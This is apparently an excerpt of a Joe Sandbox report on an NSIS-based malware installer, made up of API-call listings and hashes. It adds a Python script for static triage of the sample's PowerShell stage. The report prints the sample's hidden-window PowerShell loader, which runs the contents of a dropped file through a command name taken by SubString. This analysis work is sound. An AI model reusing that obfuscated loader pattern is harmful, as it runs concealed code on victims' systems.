                           • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID:
                          • API String ID: 3850602802-0
                          • Opcode ID: f6c8117e81de0903b802e48e7999fd2a70a6c35278de0d39013be8dd7138c214
                          • Instruction ID: 50a7fc5ec129452a525cde7c4fd9a9aa290cced010421ab9f43a5acdc6dad314
                          • Opcode Fuzzy Hash: f6c8117e81de0903b802e48e7999fd2a70a6c35278de0d39013be8dd7138c214
                          • Instruction Fuzzy Hash: 33B0127A781601BBDE615B40DF09F457EB2E768701F408039B348240F0CEB200A9DB2C
                          APIs
                          • ShellExecuteExA.SHELL32(?,00404774,?), ref: 00405978
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: ExecuteShell
                          • String ID:
                          • API String ID: 587946157-0
                          • Opcode ID: fbdde1e211bf9c759df7b0f81bfbcb60f8cdccf4e78a0d8a998f91d13d5c86f6
                          • Instruction ID: 923d99ad9cc7c2cd2e65252a1a37f78a8d30594c4c7a615bb4925eb6a4e84790
                          • Opcode Fuzzy Hash: fbdde1e211bf9c759df7b0f81bfbcb60f8cdccf4e78a0d8a998f91d13d5c86f6
                          • Instruction Fuzzy Hash: 27C092B2000200DFE301CF90CB08F067BF8AF54306F028068E184DA060C7788840CB29
                          APIs
                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004030F6,?,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 0040339E
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: FilePointer
                          • String ID:
                          • API String ID: 973152223-0
                          • Opcode ID: bee48198ef0a4de3628cda0e050061df99a752697c0ad5ddba35b49727997b0c
                          • Instruction ID: 699dda5fb03a211c19396a68767747e6c986426da1756d7c47186a7ffa8d2f84
                          • Opcode Fuzzy Hash: bee48198ef0a4de3628cda0e050061df99a752697c0ad5ddba35b49727997b0c
                          • Instruction Fuzzy Hash: EBB01231140300BFDA214F00DF09F057B21AB94710F10C034B384780F086711075EB0E
                          APIs
                          • KiUserCallbackDispatcher.NTDLL(?,0040412B), ref: 00404359
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: CallbackDispatcherUser
                          • String ID:
                          • API String ID: 2492992576-0
                          • Opcode ID: b7efc8905e9f2a5b3d5d2c2477723ee0501502072c4fff85560e1a7fdf79de64
                          • Instruction ID: b84ed7fd3cc5f3c3e9fcd53eb4babc11f88d3e7fa425116ebe2a9639eb74f9e6
                          • Opcode Fuzzy Hash: b7efc8905e9f2a5b3d5d2c2477723ee0501502072c4fff85560e1a7fdf79de64
                          • Instruction Fuzzy Hash: 28A00176505500AFCA12AB50EF1980ABB66ABA4741B818479A685601358B768831EB1B
                          APIs
                            • Part of subcall function 004053D1: lstrlenA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\,00000000,00422E40,771923A0,?,?,?,?,?,?,?,?,?,004032C3,00000000,?), ref: 0040540A
                            • Part of subcall function 004053D1: lstrlenA.KERNEL32(004032C3,Remove folder: C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\,00000000,00422E40,771923A0,?,?,?,?,?,?,?,?,?,004032C3,00000000), ref: 0040541A
                            • Part of subcall function 004053D1: lstrcatA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\,004032C3,004032C3,Remove folder: C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\,00000000,00422E40,771923A0), ref: 0040542D
                            • Part of subcall function 004053D1: SetWindowTextA.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\), ref: 0040543F
                            • Part of subcall function 004053D1: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405465
                            • Part of subcall function 004053D1: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040547F
                            • Part of subcall function 004053D1: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040548D
                            • Part of subcall function 00405926: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042BC90,?,"$Lotteris=gc -raw ',"$Lotteris=gc -raw ',?, for va",00000000), ref: 0040594F
                            • Part of subcall function 00405926: CloseHandle.KERNEL32(?), ref: 0040595C
                          • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FE5
                            • Part of subcall function 0040672A: WaitForSingleObject.KERNEL32(?,00000064), ref: 0040673B
                            • Part of subcall function 0040672A: GetExitCodeProcess.KERNEL32(?,?), ref: 0040675D
                            • Part of subcall function 004061EB: wsprintfA.USER32 ref: 004061F8
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                          • String ID:
                          • API String ID: 2972824698-0
                          • Opcode ID: 1750d852ef655aad6943f12ff86d7c5be13c4aa94793d558f94d59855ccbac7d
                          • Instruction ID: 2907458289dc89520fdc1db2e5a40f60bb15031deda838765eaf0f6b46983df9
                          • Opcode Fuzzy Hash: 1750d852ef655aad6943f12ff86d7c5be13c4aa94793d558f94d59855ccbac7d
                          • Instruction Fuzzy Hash: 0EF05B31905112DBCF20ABA55D849EF71E4DB0135CB11413FF501F21D2D7BC4A46DAAE
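The CreateProcessA call at 0040594F is where the NSIS-style installer hands off to PowerShell: the argument fragment visible above is the `$Lotteris=gc -raw '...'` command line recorded for PID 3460, the creation flag 04000000 is CREATE_DEFAULT_ERROR_MODE, and the WaitForSingleObject(?,00000064) / GetExitCodeProcess pair in subcall 0040672A is a 100 ms poll loop waiting on the child. The loader itself reads the dropped .Heg file as a single string, takes three characters at index 12754 as a command name, and invokes that command with the whole file as its argument. The Python script below is an added triage example, not part of the Joe Sandbox report or of the sample: it parses this loader pattern out of a recorded command line and reproduces the SubString step on the file statically, so an analyst can see which command the loader resolves without executing anything. The script file content is constructed for the demonstration (the real beccabunga.Heg is not reproduced on this page), and the resolved token being "iex" is only an assumption baked into that constructed file.

```python
"""Static triage of a `gc -raw` / SubString PowerShell loader command line.

Added example, not code from the Joe Sandbox report or from the sample.
The recorded command line is taken from the report; the .Heg file content
below is constructed so the example runs offline.
"""
import re

# Command line as recorded for PID 3460 in the report.
RECORDED_CMDLINE = (
    "powershell.exe -windowstyle hidden \"$Lotteris=gc -raw "
    "'C:\\Users\\user\\AppData\\Local\\Temp\\Gutturotetany\\dearth\\beccabunga.Heg';"
    "$Kogers=$Lotteris.SubString(12754,3);.$Kogers($Lotteris) \""
)

# Generic shape: $A=gc -raw '<path>';$B=$A.SubString(<off>,<len>);.$B($A)
LOADER_RE = re.compile(
    r"\$(?P<v1>\w+)\s*=\s*(?:gc|get-content)\s+-raw\s+'(?P<path>[^']+)'\s*;"
    r"\s*\$(?P<v2>\w+)\s*=\s*\$(?P=v1)\.SubString\((?P<off>\d+)\s*,\s*(?P<len>\d+)\)\s*;"
    r"\s*\.\s*\$(?P=v2)\(\$(?P=v1)\)",
    re.IGNORECASE,
)


def parse_loader(cmdline: str):
    """Return (script_path, offset, length) or None if the pattern is absent."""
    m = LOADER_RE.search(cmdline)
    if not m:
        return None
    return m.group("path"), int(m.group("off")), int(m.group("len"))


def resolve_command(script_bytes: bytes, offset: int, length: int,
                    encoding: str = "cp1252") -> str:
    """Reproduce `$text.SubString(offset, length)` without running PowerShell.

    `gc -raw` yields one .NET string, so SubString indexes decoded characters,
    not file bytes. Windows PowerShell 5.1 decodes a BOM-less file with the
    system ANSI code page (cp1252 is assumed here); a UTF-16 or UTF-8 BOM
    changes the decoding and therefore the index, so honour it before slicing.
    (Python indexes code points where .NET indexes UTF-16 units; they agree
    for BMP-only text, which is all this example handles.)
    """
    if script_bytes.startswith(b"\xff\xfe"):
        text = script_bytes[2:].decode("utf-16-le", errors="replace")
    elif script_bytes.startswith(b"\xef\xbb\xbf"):
        text = script_bytes[3:].decode("utf-8", errors="replace")
    else:
        # errors="replace" keeps one char per byte, preserving index alignment.
        text = script_bytes.decode(encoding, errors="replace")
    if offset + length > len(text):
        raise ValueError("SubString range lies past the end of the decoded script")
    return text[offset:offset + length]


def triage(cmdline: str, script_bytes: bytes) -> dict:
    """Parse the loader, resolve the command token, and report what it invokes."""
    parsed = parse_loader(cmdline)
    if parsed is None:
        return {"matched": False}
    path, off, ln = parsed
    cmd = resolve_command(script_bytes, off, ln)
    return {
        "matched": True,
        "script_path": path,
        "offset": off,
        "length": ln,
        "resolved_command": cmd,
        # `.$B($A)` calls the command named by the token with the entire
        # file text as its argument, i.e. the script body is the payload.
        "argument_bytes": len(script_bytes),
        "is_invoke_expression": cmd.strip().lower() in ("iex", "invoke-expression"),
    }


def build_constructed_script(command_token: str = "iex", offset: int = 12754) -> bytes:
    """Constructed stand-in for beccabunga.Heg (assumption, not the real file):
    comment-line filler up to `offset`, then the command token, then more filler.
    Only the layout matters for the demonstration."""
    filler = b"#" + b"A" * 78 + b"\r\n"
    body = bytearray()
    while len(body) < offset:
        body += filler
    body = body[:offset]
    body += command_token.encode("ascii")
    body += b"\r\n# constructed payload placeholder\r\n"
    return bytes(body)


if __name__ == "__main__":
    result = triage(RECORDED_CMDLINE, build_constructed_script())
    for key, value in result.items():
        print(f"{key}: {value}")
```

Run it against the real dropped file by replacing the constructed bytes with `Path(...).read_bytes()`; if the resolved token is `iex` or `Invoke-Expression`, the file body is the next-stage script and can be handed to a deobfuscation pass without ever executing the loader.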
                          APIs
                          • GetDlgItem.USER32(?,000003FB), ref: 0040480E
                          • SetWindowTextA.USER32(00000000), ref: 00404838
                          • SHBrowseForFolderA.SHELL32(?,?,?,?,00429860,?,?,00000014,?,?,00000001,?,?,?,?,000003FB), ref: 004048E9
                          • CoTaskMemFree.OLE32(00000000,?,?,?,00429860,?,?,00000014,?,?,00000001,?,?,?,?,000003FB), ref: 004048F4
                          • lstrcmpiA.KERNEL32(Remove folder: ,0042A488), ref: 00404926
                          • lstrcatA.KERNEL32(?,Remove folder: ,?,?,?,?,00429860,?,?,00000014,?,?,00000001,?), ref: 00404932
                          • SetDlgItemTextA.USER32(?,000003FB), ref: 00404944
                            • Part of subcall function 00405CB8: CharNextA.USER32(?,?,C:\,0000000C,00405D24,C:\,C:\,77193410,?,C:\Users\user\AppData\Local\Temp\,00405A6F,?,77193410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\vfhlZ0vrbe.exe"), ref: 00405CC6
                            • Part of subcall function 00405CB8: CharNextA.USER32(00000000), ref: 00405CCB
                            • Part of subcall function 00405CB8: CharNextA.USER32(00000000), ref: 00405CDF
                          • GetDiskFreeSpaceA.KERNEL32(00429458,?,?,0000040F,?,00429458,00429458,?,00000001,00429458,?,?,000003FB,?,?,00000014), ref: 00404A02
                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404A1D
                            • Part of subcall function 00405C1F: lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004033C5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 00405C25
                            • Part of subcall function 00405C1F: CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004033C5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 00405C2E
                            • Part of subcall function 00405C1F: lstrcatA.KERNEL32(?,0040A014,?,00000008,0000000A,0000000C), ref: 00405C3F
                          • SetDlgItemTextA.USER32(00000000,00000400,00429448), ref: 00404AAF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: Char$ItemNextText$Freelstrcat$BrowseDiskFolderPrevSpaceTaskWindowlstrcmpilstrlen
                          • String ID: A$C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth$Remove folder:
                          • API String ID: 326488526-3947683311
                          • Opcode ID: e2e84c6a26e19a8dedc43b182c38c662e0fd0fd58dd502147bd47aad6c024144
                          • Instruction ID: 0ed023ad5a6041dbbe712cf1cd1bcdfebaf78e19e7ba4d6f6a4a431d05d4e923
                          • Opcode Fuzzy Hash: e2e84c6a26e19a8dedc43b182c38c662e0fd0fd58dd502147bd47aad6c024144
                          • Instruction Fuzzy Hash: A9918EF1A00209AADB11AFA5CD45BAFB6B8AF84314F14807BF611B62D1D77889418F6D
                          APIs
                          • CoCreateInstance.OLE32(0040851C,?,00000001,0040850C,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040221D
                          • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,0040850C,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004022CF
                          Strings
                          • C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\Reunified\Betrkkene, xrefs: 0040225D
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: ByteCharCreateInstanceMultiWide
                          • String ID: C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\Reunified\Betrkkene
                          • API String ID: 123533781-929867550
                          • Opcode ID: 26e4af273d4ad834d7dd4ca4c27adc144b69110a5e0929a66cb48c7bfc0a4cbf
                          • Instruction ID: 9693176738af107330769ac86e8646dde0b712c02a361864b0ed1875b7ced88a
                          • Opcode Fuzzy Hash: 26e4af273d4ad834d7dd4ca4c27adc144b69110a5e0929a66cb48c7bfc0a4cbf
                          • Instruction Fuzzy Hash: DB511971A00208AFDF00EFA4CA88A9D7BB5FF48314F2045BAF505FB2D1DA799981CB54
                          APIs
                          • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004027DE
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: FileFindFirst
                          • String ID:
                          • API String ID: 1974802433-0
                          • Opcode ID: 930922f26d5cdd011eb09c6a8250f7f43846b17323c9774391e4e916de6dacb1
                          • Instruction ID: 474e59c826447b87e47a37c01b73ad662870a85b7ff57bc711f4e8679485c19e
                          • Opcode Fuzzy Hash: 930922f26d5cdd011eb09c6a8250f7f43846b17323c9774391e4e916de6dacb1
                          • Instruction Fuzzy Hash: 9CF0A771605110DFDB51EBA49E49AEE77689F21314F6005BBE141F20C2C6B889469B2E
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: aa1aee8a5b3a43351eb0af44d038224c2164fb65a2c69693e5a9d071f73749d8
                          • Instruction ID: 8768c5d39ca9d5d04b1d74764d0b3cf6a08d2071900a395e822ff8491b177041
                          • Opcode Fuzzy Hash: aa1aee8a5b3a43351eb0af44d038224c2164fb65a2c69693e5a9d071f73749d8
                          • Instruction Fuzzy Hash: D0E18B7190470ACFDB24CF58C880BAAB7F1FB44305F15842EE497A72D1E738AA95CB14
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a9cb70b00609610c9cca6f4380fd1e18b8a5d323992726cc20c86ef30203be9c
                          • Instruction ID: f47cbf795ca4a3d69f538e4be7b2a99fc2d626584dbd2fed0361fe359b0b9102
                          • Opcode Fuzzy Hash: a9cb70b00609610c9cca6f4380fd1e18b8a5d323992726cc20c86ef30203be9c
                          • Instruction Fuzzy Hash: F0B12871E04219DBCF18CF68D4905EEBBB2BF98314F25826AC85677384D734AA42CF95
                          APIs
                          • GetDlgItem.USER32(?,000003F9), ref: 00404D49
                          • GetDlgItem.USER32(?,00000408), ref: 00404D56
                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404DA5
                          • LoadImageA.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404DBC
                          • SetWindowLongA.USER32(?,000000FC,00405345), ref: 00404DD6
                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404DE8
                          • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404DFC
                          • SendMessageA.USER32(?,00001109,00000002), ref: 00404E12
                          • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404E1E
                          • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404E2E
                          • DeleteObject.GDI32(00000110), ref: 00404E33
                          • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404E5E
                          • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404E6A
                          • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404F04
                          • SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404F34
                            • Part of subcall function 00404362: SendMessageA.USER32(00000028,?,00000001,00404192), ref: 00404370
                          • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404F48
                          • GetWindowLongA.USER32(?,000000F0), ref: 00404F76
                          • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404F84
                          • ShowWindow.USER32(?,00000005), ref: 00404F94
                          • SendMessageA.USER32(?,00000419,00000000,?), ref: 0040508F
                          • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 004050F4
                          • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00405109
                          • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 0040512D
                          • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 0040514D
                          • ImageList_Destroy.COMCTL32(?), ref: 00405162
                          • GlobalFree.KERNEL32(?), ref: 00405172
                          • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 004051EB
                          • SendMessageA.USER32(?,00001102,?,?), ref: 00405294
                          • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 004052A3
                          • InvalidateRect.USER32(?,00000000,00000001), ref: 004052CE
                          • ShowWindow.USER32(?,00000000), ref: 0040531C
                          • GetDlgItem.USER32(?,000003FE), ref: 00405327
                          • ShowWindow.USER32(00000000), ref: 0040532E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.16255137450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000000.00000002.16255083471.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255190632.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255247283.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.16255452100.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_vfhlZ0vrbe.jbxd
                          Similarity
                          • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                          • String ID: $M$N
                          • API String ID: 2564846305-813528018
                          • Opcode ID: c8e1d04b8d39ebbf2dcd292838eac2719ba6188869ab5a5976a4ec129dc76671
                          • Instruction ID: b1cb089e499fd84ad02b8b6dcb50706d58213328e80d7969948961eab3192630
                          • Opcode Fuzzy Hash: c8e1d04b8d39ebbf2dcd292838eac2719ba6188869ab5a5976a4ec129dc76671
                          • Instruction Fuzzy Hash: B1027DB0A00609AFDF209F94DD45AAE7BB5FB44354F50817AFA10BA2E1C7789D42CF58
                          APIs
                          • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00404523
                          • GetDlgItem.USER32(00000000,000003E8), ref: 00404537
                          • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00404555
                          • GetSysColor.USER32(?), ref: 00404566
                          • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404575
                          • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404584
